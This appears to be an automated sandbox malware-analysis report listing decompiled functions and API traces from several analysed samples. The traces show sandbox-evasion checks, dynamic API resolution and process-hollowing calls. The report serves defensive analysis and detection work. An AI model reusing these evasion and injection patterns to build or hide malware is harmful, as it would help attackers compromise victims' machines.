API String ID: 3541104900-0
Opcode ID: 3f6ea1475b6a799feff947736ee965e7d5baee5b117e73dbe9ef4aba49eea13c
Instruction ID: 8fe734ea7a3e9d60b3fb0a2432432659592738d3c611978c4f791e6fb59038fc
Opcode Fuzzy Hash: 3f6ea1475b6a799feff947736ee965e7d5baee5b117e73dbe9ef4aba49eea13c
Instruction Fuzzy Hash: 6E5198B4E00209DFCB45CF98C585AAEBBB6BF48314F508559EA05AB345C731ED85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00411DB0, Relevance: 6.1, APIs: 4, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411DB0(intOrPtr __ecx, void* _a4, signed int _a8) {
				void* _v8;
				struct _OVERLAPPED* _v12;
				long _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				signed char _t101;
				void* _t102;
				intOrPtr _t110;
				intOrPtr _t113;
				intOrPtr _t128;
				intOrPtr _t131;
				void* _t148;

				_v28 = __ecx;
				_v8 = _a4;
				if(( *(_v28 + 0x2d) & 0x000000ff) == 0) {
					L11:
					_t110 = _v28;
					__eflags =  *((intOrPtr*)(_t110 + 0x20));
					if( *((intOrPtr*)(_t110 + 0x20)) == 0) {
						_t128 = _v28;
						__eflags =  *((intOrPtr*)(_t128 + 4));
						if( *((intOrPtr*)(_t128 + 4)) == 0) {
							 *((intOrPtr*)(_v28 + 0x14)) = 0x1000000;
							__eflags = 0;
							return 0;
						}
						WriteFile( *(_v28 + 4), _v8, _a8,  &_v16, 0);
						return _v16;
					}
					_t131 = _v28;
					_t113 = _v28;
					__eflags =  *((intOrPtr*)(_t131 + 0x24)) + _a8 -  *((intOrPtr*)(_t113 + 0x28));
					if( *((intOrPtr*)(_t131 + 0x24)) + _a8 <  *((intOrPtr*)(_t113 + 0x28))) {
						memcpy( *((intOrPtr*)(_v28 + 0x20)) +  *((intOrPtr*)(_v28 + 0x24)), _v8, _a8);
						 *((intOrPtr*)(_v28 + 0x24)) =  *((intOrPtr*)(_v28 + 0x24)) + _a8;
						return _a8;
					}
					 *((intOrPtr*)(_v28 + 0x14)) = 0x30000;
					return 0;
				}
				if( *(_v28 + 0x3c) != 0 &&  *((intOrPtr*)(_v28 + 0x40)) < _a8) {
					_v20 =  *(_v28 + 0x3c);
					E0040B5B0(_v20);
					_t148 = _t148 + 4;
					 *(_v28 + 0x3c) = 0;
				}
				_t117 = _v28;
				if( *(_v28 + 0x3c) == 0) {
					_t102 = E0040B590(_t117, _a8 << 1);
					_t148 = _t148 + 4;
					_v24 = _t102;
					 *(_v28 + 0x3c) = _v24;
					 *((intOrPtr*)(_v28 + 0x40)) = _a8;
				}
				memcpy( *(_v28 + 0x3c), _a4, _a8);
				_v12 = 0;
				while(1) {
					_t154 = _v12 - _a8;
					if(_v12 >= _a8) {
						break;
					}
					_t101 = E004114E0( *( *(_v28 + 0x3c) + _v12) & 0x000000ff, _t154, _v28 + 0x30,  *( *(_v28 + 0x3c) + _v12) & 0x000000ff);
					_t148 = _t148 + 8;
					 *( *(_v28 + 0x3c) + _v12) = _t101;
					_v12 =  &(_v12->Internal);
				}
				_v8 =  *(_v28 + 0x3c);
				goto L11;
			}

0x00411db6
0x00411dbc
0x00411dc8
0x00411e90
0x00411e90
0x00411e93
0x00411e97
0x00411ee9
0x00411eec
0x00411ef0
0x00411f15
0x00411f1c
0x00000000
0x00411f1c
0x00411f07
0x00000000
0x00411f0d
0x00411e99
0x00411ea2
0x00411ea5
0x00411ea8
0x00411ecd
0x00411edf
0x00000000
0x00411ee2
0x00411ead
0x00000000
0x00411eb4
0x00411dd5
0x00411de8
0x00411def
0x00411df4
0x00411dfa
0x00411dfa
0x00411e01
0x00411e08
0x00411e10
0x00411e15
0x00411e18
0x00411e21
0x00411e2a
0x00411e2a
0x00411e3c
0x00411e42
0x00411e54
0x00411e57
0x00411e5a
0x00000000
0x00000000
0x00411e71
0x00411e76
0x00411e82
0x00411e51
0x00411e51
0x00411e8d
0x00000000

APIs

new[].LIBCMTD ref: 00411E10
memcpy.NTDLL(00000000,?,000000FF,?,0041289D,?,000000FF,?,00004000), ref: 00411E3C
memcpy.NTDLL(00000000,00004000,000000FF,?,0041289D,?,000000FF,?,00004000), ref: 00411ECD

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: memcpy$new[]
String ID:
API String ID: 3541104900-0
Opcode ID: e6a56af37c6e19b6ed2c0ea83cdf516621f6fac75bc61e6ebff01ec4e90410b0
Instruction ID: 1be85da1f02f000736658b6362af722e2e86620b20a10b8620c900d99ce7c40f
Opcode Fuzzy Hash: e6a56af37c6e19b6ed2c0ea83cdf516621f6fac75bc61e6ebff01ec4e90410b0
Instruction Fuzzy Hash: 0051C7B8A00209DFCB44CF98C581EAEBBB6FF88314F548159EA05AB355D735E981CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040BEB0, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040BEB0(char* _a4, char* _a8, intOrPtr _a12) {
				char* _v8;
				char* _v12;
				char* _v16;
				char _v17;
				intOrPtr _v24;

				_v8 = StrStrA(_a4, _a8);
				if(_v8 != 0) {
					 *0x41a994(0x41ac88, _a4, _v8 - _a4);
					 *(_v8 - _a4 + 0x41ac88) = 0;
					_v12 = _a8;
					_v16 =  &(_v12[1]);
					do {
						_v17 =  *_v12;
						_v12 =  &(_v12[1]);
					} while (_v17 != 0);
					_v24 = _v12 - _v16;
					wsprintfA(_v8 - _a4 + 0x41ac88, "%s%s", _a12, _v8 + _v24);
					return 0x41ac88;
				}
				return _a4;
			}

0x0040bec4
0x0040becb
0x0040bee2
0x0040beee
0x0040bef8
0x0040bf01
0x0040bf04
0x0040bf09
0x0040bf0c
0x0040bf10
0x0040bf1c
0x0040bf3b
0x00000000
0x0040bf44
0x00000000

APIs

StrStrA.SHLWAPI(02E47018,?,?,004061B1,?,02E47018,00000000), ref: 0040BEBE
lstrcpyn.KERNEL32(0041AC88,02E47018,02E47018,?,004061B1,?,02E47018), ref: 0040BEE2
wsprintfA.USER32 ref: 0040BF3B

Strings

%s%s, xrefs: 0040BF2A

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: lstrcpynwsprintf
String ID: %s%s
API String ID: 1799455324-3252725368
Opcode ID: 968c324a661e519957af98edf49b8511bb81e06ad5647acdf799b48dea5bf767
Instruction ID: 9d0df258c1970b53338195e9cfc72265299fee085df88f93dfbf2dd1b14f7860
Opcode Fuzzy Hash: 968c324a661e519957af98edf49b8511bb81e06ad5647acdf799b48dea5bf767
Instruction Fuzzy Hash: 3A21F975901108FFDF05DFACC984AEEBBB4EF48344F108199E909A7341D735AA90CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 02D26DB0, Relevance: 6.0, APIs: 4, Instructions: 49threadsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 02D2C530: GetProcAddress.KERNEL32(0041AA64,0041A718), ref: 02D2C582
Part of subcall function 02D2C530: GetProcAddress.KERNEL32(0041AA64,0041A33C), ref: 02D2C59A
Part of subcall function 02D2C530: GetProcAddress.KERNEL32(0041AA64,0041A5BC), ref: 02D2C5B2
Part of subcall function 02D2C530: GetProcAddress.KERNEL32(0041AA64,0041A4B0), ref: 02D2C5CB
Part of subcall function 02D2C530: GetProcAddress.KERNEL32(0041AA64,0041A4C8), ref: 02D2C5E3
Part of subcall function 02D2C530: GetProcAddress.KERNEL32(0041AA64,0041A7D4), ref: 02D2C5FB
Part of subcall function 02D2C530: GetProcAddress.KERNEL32(0041AA64,0041A324), ref: 02D2C614
Part of subcall function 02D2C530: GetProcAddress.KERNEL32(0041AA64,0041A6F0), ref: 02D2C62C
Part of subcall function 02D2C530: GetProcAddress.KERNEL32(0041AA64,0041A7B0), ref: 02D2C644
Part of subcall function 02D2C530: GetProcAddress.KERNEL32(0041AA64,0041A218), ref: 02D2C65D
Part of subcall function 02D2C530: GetProcAddress.KERNEL32(0041AA64,004192A0), ref: 02D2C673
Part of subcall function 02D2C530: LoadLibraryA.KERNEL32(0041A0F8,?,02D26DC2), ref: 02D2C685
Part of subcall function 02D2C530: LoadLibraryA.KERNEL32(0041A658,?,02D26DC2), ref: 02D2C697
Part of subcall function 02D2C530: GetProcAddress.KERNEL32(0041A854,0041A594), ref: 02D2C6B8

Part of subcall function 02D212A0: GetCurrentProcess.KERNEL32(00000000,?,00003000,00000040,00000000), ref: 02D212BA
Part of subcall function 02D212A0: VirtualAllocExNuma.KERNEL32(00000000), ref: 02D212C1
Part of subcall function 02D212A0: ExitProcess.KERNEL32 ref: 02D212D2

Part of subcall function 02D26CF0: GetTickCount.KERNEL32 ref: 02D26CF6
Part of subcall function 02D26CF0: Sleep.KERNEL32(00002710), ref: 02D26D04
Part of subcall function 02D26CF0: GetTickCount.KERNEL32 ref: 02D26D0A

Sleep.KERNEL32(000003E7), ref: 02D26E45

Part of subcall function 02D26C60: GetUserDefaultLangID.KERNEL32 ref: 02D26C6D

Part of subcall function 02D26D80: CreateMutexA.KERNEL32(00000000,00000000,0041A124), ref: 02D26D8D
Part of subcall function 02D26D80: GetLastError.KERNEL32 ref: 02D26D93

Part of subcall function 02D2C6F0: GetProcAddress.KERNEL32(0041AA64,0041A0B4), ref: 02D2C70D
Part of subcall function 02D2C6F0: GetProcAddress.KERNEL32(0041AA64,0041A728), ref: 02D2C725
Part of subcall function 02D2C6F0: GetProcAddress.KERNEL32(0041AA64,0041A2BC), ref: 02D2C73E
Part of subcall function 02D2C6F0: GetProcAddress.KERNEL32(0041AA64,0041A668), ref: 02D2C756
Part of subcall function 02D2C6F0: GetProcAddress.KERNEL32(0041AA64,0041A5D8), ref: 02D2C76E
Part of subcall function 02D2C6F0: GetProcAddress.KERNEL32(0041AA64,0041A26C), ref: 02D2C787
Part of subcall function 02D2C6F0: GetProcAddress.KERNEL32(0041AA64,0041A64C), ref: 02D2C79F
Part of subcall function 02D2C6F0: GetProcAddress.KERNEL32(0041AA64,0041A4B8), ref: 02D2C7B7
Part of subcall function 02D2C6F0: GetProcAddress.KERNEL32(0041AA64,0041A2B4), ref: 02D2C7D0
Part of subcall function 02D2C6F0: GetProcAddress.KERNEL32(0041AA64,0041A7BC), ref: 02D2C7E8
Part of subcall function 02D2C6F0: GetProcAddress.KERNEL32(0041AA64,0041A49C), ref: 02D2C800
Part of subcall function 02D2C6F0: GetProcAddress.KERNEL32(0041AA64,0041A4FC), ref: 02D2C819
Part of subcall function 02D2C6F0: GetProcAddress.KERNEL32(0041AA64,0041A3A8), ref: 02D2C831
Part of subcall function 02D2C6F0: GetProcAddress.KERNEL32(0041AA64,0041A1C0), ref: 02D2C849
Part of subcall function 02D2C6F0: GetProcAddress.KERNEL32(0041AA64,0041A1F8), ref: 02D2C862
Part of subcall function 02D2C6F0: GetProcAddress.KERNEL32(0041AA64,0041A7AC), ref: 02D2C87A

CreateThread.KERNEL32(00000000,00000000,00401020,00000000,00000000,00000000), ref: 02D26E0C

Part of subcall function 02D26B40: GetSystemTime.KERNEL32(?,?,00000104), ref: 02D26BC1
Part of subcall function 02D26B40: lstrcat.KERNEL32(?,0041A60C), ref: 02D26BD5
Part of subcall function 02D26B40: sscanf.NTDLL ref: 02D26C13
Part of subcall function 02D26B40: SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02D26C27
Part of subcall function 02D26B40: SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02D26C38
Part of subcall function 02D26B40: ExitProcess.KERNEL32 ref: 02D26C52

CreateThread.KERNEL32(00000000,00000000,00406650,00000000,00000000,00000000), ref: 02D26E26
ExitProcess.KERNEL32 ref: 02D26E54

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: AddressProc$Time$Process$CreateExitSystem$CountFileLibraryLoadSleepThreadTick$AllocCurrentDefaultErrorLangLastMutexNumaUserVirtuallstrcatsscanf
String ID:
API String ID: 482147807-0
Opcode ID: a349654e72635f791abaff99105bb45aa78bda0ff43d1d0459ce1a65ca71d6f4
Instruction ID: 4cc3afe64dd42e36cdd2a87ddbb40cbda54ac87f46477ca910acccab4f5245c7
Opcode Fuzzy Hash: a349654e72635f791abaff99105bb45aa78bda0ff43d1d0459ce1a65ca71d6f4
Instruction Fuzzy Hash: 3F01E4346843A1A2E2603BB1DD06B5D254ECF30B8DF158021AA05A83D0EF95EC4C88BF

Uniqueness

Uniqueness Score: -1.00%

Function 02D2AF30, Relevance: 6.0, APIs: 4, Instructions: 33memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,02D25A0A), ref: 02D2AF3D
RtlAllocateHeap.NTDLL(00000000), ref: 02D2AF44
GetLocalTime.KERNEL32(?,?,?,?,?,02D25A0A), ref: 02D2AF51
wsprintfA.USER32 ref: 02D2AF7E

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: 8e285d3c0eb36019000bcc5d6a07b144cb12c9e005f16ceaedbebfc32425e432
Instruction ID: d54db4264a189618d18ac0c6d63712439e5e5702a0e8137862d75125f6334758
Opcode Fuzzy Hash: 8e285d3c0eb36019000bcc5d6a07b144cb12c9e005f16ceaedbebfc32425e432
Instruction Fuzzy Hash: 2FF06DB5800118BBCB10DBE99D489FFB3B8BF0CB02F00415AFA41A1180E6388A90D776

Uniqueness

Uniqueness Score: -1.00%

Function 02D2AF90, Relevance: 6.0, APIs: 4, Instructions: 32memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D2AFA0
RtlAllocateHeap.NTDLL(00000000), ref: 02D2AFA7
GetTimeZoneInformation.KERNEL32(?), ref: 02D2AFBA
wsprintfA.USER32 ref: 02D2AFF4

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: c1eaeb3e9eb05cc2c06cb84a2f343100f25f8727c1150393eb784ecd10d2e60d
Instruction ID: db83636df1be6a914f047db6dc3b452238e872034c6a172e54afe0a27479c13d
Opcode Fuzzy Hash: c1eaeb3e9eb05cc2c06cb84a2f343100f25f8727c1150393eb784ecd10d2e60d
Instruction Fuzzy Hash: 9AF0F070A04328DBDB209BA0DE49BE9B37AEB04301F0046E1FA0993291CB749E94CF43

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 2B8.exe PID: 5780 Parent PID: 3352 2B8.exeCOMMON

Execution Graph

Execution Coverage:	2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	34
Total number of Limit Nodes:	1

Executed Functions

Function 047C003C, Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 047C024D

Strings

cess, xrefs: 047C018D
kernel32.dll, xrefs: 047C008F, 047C0095

Memory Dump Source

Source File: 0000001A.00000002.462876681.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_47c0000_2B8.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction ID: cca30476ec4649c1d7747a963ead1839243ac8669cdee7c4dbb2e4d05a608a22
Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction Fuzzy Hash: 61526A74A01269DFDB64CF98C984BACBBB1BF09304F1480D9E54DAB351DB30AA85DF54

Uniqueness

Uniqueness Score: -1.00%

Function 047C0DF8, Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,047C0223,?,?), ref: 047C0E02
SetErrorMode.KERNELBASE(00000000,?,?,047C0223,?,?), ref: 047C0E07

Memory Dump Source

Source File: 0000001A.00000002.462876681.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_47c0000_2B8.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 1a2395c1470aab3b27c08a211a7976d8233222b7a6029c967ecfa1777ef915b5
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 9BD0123114512CB7D7002AD4DC09BCD7B1C9F05B66F008055FB0DD9181C770994046E5

Uniqueness

Uniqueness Score: -1.00%

Function 02BE07A6, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Module32First.KERNEL32(00000000,00000224), ref: 02BE07EE

Memory Dump Source

Source File: 0000001A.00000002.462421467.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2be0000_2B8.jbxd

Similarity

API ID: FirstModule32
String ID:
API String ID: 3757679902-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 33ea0cb339d0724a939c9eeac33a037b4b2322d63eff9f79853d38ef24f0a5e6
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: AFF096311017116FDB203BF5A8CDB6F76F8EF49665F100968E643A10C0DBF4E8454E61

Uniqueness

Uniqueness Score: -1.00%

Function 047C0920, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateProcess.KERNELBASE(000000FF,00000000), ref: 047C0929

Memory Dump Source

Source File: 0000001A.00000002.462876681.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_47c0000_2B8.jbxd

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 89cc55c70507a058e9ffb3aae4f4296a9997ee6c0a4edae31c5b1a86bfd637e3
Instruction ID: 30f3d7182eefe4c983e93399632d1765ae8032794c4adb82b9e2ac84a56656d9
Opcode Fuzzy Hash: 89cc55c70507a058e9ffb3aae4f4296a9997ee6c0a4edae31c5b1a86bfd637e3
Instruction Fuzzy Hash: EE90026074415011D82025AC0C02B0500121751634F344B107130AD1E4D840D6400115

Uniqueness

Uniqueness Score: -1.00%

Function 02BE0465, Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02BE04B6

Memory Dump Source

Source File: 0000001A.00000002.462421467.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2be0000_2B8.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 9db8779a6356ec28ca537017bdc8dc5a6edb3dd7c5edc4abf4fc99b00654d977
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: A7113C79A40208EFDB01DF98CA85E98BBF5EF08351F098094F948AB361D771EA50DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: 1F0B.exe PID: 6016 Parent PID: 3352 1F0B.exeCOMMON

Executed Functions

Function 057353F8, Relevance: 2.5, Strings: 1, Instructions: 1234COMMON

Download Yara Rule

Strings

{&, xrefs: 05736373

Memory Dump Source

Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID: {&
API String ID: 0-4210536796
Opcode ID: f2cd062c9c1f332aaac14319f13f17333e6ac23a092e1dacdcc63eefc0beeee1
Instruction ID: c83cabfd97f7ddd9a5b7f0ac9c27d69e376f8891fc3005bc786fd525a9b899f3
Opcode Fuzzy Hash: f2cd062c9c1f332aaac14319f13f17333e6ac23a092e1dacdcc63eefc0beeee1
Instruction Fuzzy Hash: 6EB24974B102158FCB24DF69C594A69B7F6BF88324F1585A9E40ADB366DB30EC81CF12

Uniqueness

Uniqueness Score: -1.00%

Function 0574EFB3, Relevance: 1.6, APIs: 1, Instructions: 80
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0574F063

Memory Dump Source

Source File: 0000001F.00000002.474211845.0000000005740000.00000040.00000001.sdmp, Offset: 05740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5740000_1F0B.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 7bcb51cf83bda41bb1ac118ea05310bdeeb63c8cbe04b4957f861edd81f6da35
Instruction ID: 6d7fa4716d38100588167f1d517dff5da121ed731809fc6fb231dd2c491958cf
Opcode Fuzzy Hash: 7bcb51cf83bda41bb1ac118ea05310bdeeb63c8cbe04b4957f861edd81f6da35
Instruction Fuzzy Hash: AD3158759002489FDB10DFAAC884BDEFBF8FF48214F04842AE919A7210D7359554CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0574EFD8, Relevance: 1.6, APIs: 1, Instructions: 65
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0574F063

Memory Dump Source

Source File: 0000001F.00000002.474211845.0000000005740000.00000040.00000001.sdmp, Offset: 05740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5740000_1F0B.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: f71e1df12e92e8adaf4e81817400dd82f40598c107e03689539003dcb60f6166
Instruction ID: fbac5d5aa1f271c1b52df2d5e8d3d7e47eb0b33f7353580aa1c2f6d72574ff24
Opcode Fuzzy Hash: f71e1df12e92e8adaf4e81817400dd82f40598c107e03689539003dcb60f6166
Instruction Fuzzy Hash: B32107B19002499FDB10CFAAC884BDEBBF9FF58314F148429E915A7210C7359954DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0574EFE0, Relevance: 1.6, APIs: 1, Instructions: 61
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0574F063

Memory Dump Source

Source File: 0000001F.00000002.474211845.0000000005740000.00000040.00000001.sdmp, Offset: 05740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5740000_1F0B.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 1e28bcff08942792f477e0f77843c23e6546b35137388e0b0350fc53859f305f
Instruction ID: b6abd37070af26ac69448b94c43698d176fa781bc403f77b74b4893ecb6b6803
Opcode Fuzzy Hash: 1e28bcff08942792f477e0f77843c23e6546b35137388e0b0350fc53859f305f
Instruction Fuzzy Hash: DF21E4B19002499FDB10CFAAC884AEEBBF9FF58314F50842AE919A7210C7759954DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0574EEFB, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON

Download Yara Rule

APIs

NtUnmapViewOfSection.NTDLL(?,?), ref: 0574EF65

Memory Dump Source

Source File: 0000001F.00000002.474211845.0000000005740000.00000040.00000001.sdmp, Offset: 05740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5740000_1F0B.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 31352e674f03236dda73e70a8fecc40700bd14611eb30632a1aa0f27eafa6281
Instruction ID: 259ac59bbfe2b881a16fb688d357b9a9d71f10abe4b94e2d0c5006b0de3b7468
Opcode Fuzzy Hash: 31352e674f03236dda73e70a8fecc40700bd14611eb30632a1aa0f27eafa6281
Instruction Fuzzy Hash: E5112BB19006488BDB10DFAAC4487DFFBF9EF98324F148829D555A7340C775A544CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0574EF00, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

NtUnmapViewOfSection.NTDLL(?,?), ref: 0574EF65

Memory Dump Source

Source File: 0000001F.00000002.474211845.0000000005740000.00000040.00000001.sdmp, Offset: 05740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5740000_1F0B.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 8e7ba0dd143ea04d1a26f5d479b603ee52463f2db3409d08c0eaf60924e3d95a
Instruction ID: b9d9eda55ff6d12c63fee2de03823266b5d5c501b46f60842b74168365fd1cf1
Opcode Fuzzy Hash: 8e7ba0dd143ea04d1a26f5d479b603ee52463f2db3409d08c0eaf60924e3d95a
Instruction Fuzzy Hash: 581128B19006488BDB10DFAAC4447DFFBF9EF98324F148829D415A7240CB79A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05731810, Relevance: .4, Instructions: 401COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d5508f1e2a14b76a2cd2a9d53da37f5ba87783bdad234582994e6f854f2e49d
Instruction ID: 9bd8789f74408e95b9f73eed29e9f9cc71f56e4ed7bdba9b6a1800cc2b2b203e
Opcode Fuzzy Hash: 7d5508f1e2a14b76a2cd2a9d53da37f5ba87783bdad234582994e6f854f2e49d
Instruction Fuzzy Hash: 8DF17E34A00209DFCB14DFA4D459AAEBBB2FF88314F548969E806AB395DF31DC46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05737F28, Relevance: 3.3, Instructions: 3299
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001F.00000002.474194290.0000000005730000.00000040.00000001.sdmp, Offset: 05730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5730000_1F0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f89bf5734dd9455f215499fb50ad026037d58b183b9e5c4581d98b4a7cbbecf7
Instruction ID: 965e6b440d1bac182fcd44c57039035b79cc71624cdf4245a01c2139a0c75ce5
Opcode Fuzzy Hash: f89bf5734dd9455f215499fb50ad026037d58b183b9e5c4581d98b4a7cbbecf7
Instruction Fuzzy Hash: 63635C70A41218AFEB259BA0CC55BDE7BB6FB84704F0040A9E60A7B3D0DB756E84DF45

Uniqueness

Uniqueness Score: -1.00%

Function 05A1F738, Relevance: 1.6, APIs: 1, Instructions: 145
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNELBASE(?,?,?,?,0000000A,?,?,?,?,?,?,?), ref: 05A1F8A6

Memory Dump Source

Source File: 0000001F.00000002.474438282.0000000005A10000.00000040.00000001.sdmp, Offset: 05A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_5a10000_1F0B.jbxd

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: fc34932b6dd93042c98786393367ac4630d4e88a031d643feb1100b083d75ce2
Instruction ID: 2c369aed651028a5bf06d522433f216a47edb7da2981cb680ace825938ad1bbd
Opcode Fuzzy Hash: fc34932b6dd93042c98786393367ac4630d4e88a031d643feb1100b083d75ce2
Instruction Fuzzy Hash: BE511371D00269DFDF24CF95C840BDEBBB6BB48304F0484AAE909B7250DB319A85DF60

Uniqueness

Uniqueness Score: -1.00%

Function 03180767, Relevance: 1.6, APIs: 1, Instructions: 103
libraryCOMMON

Download Yara Rule

Control-flow Graph

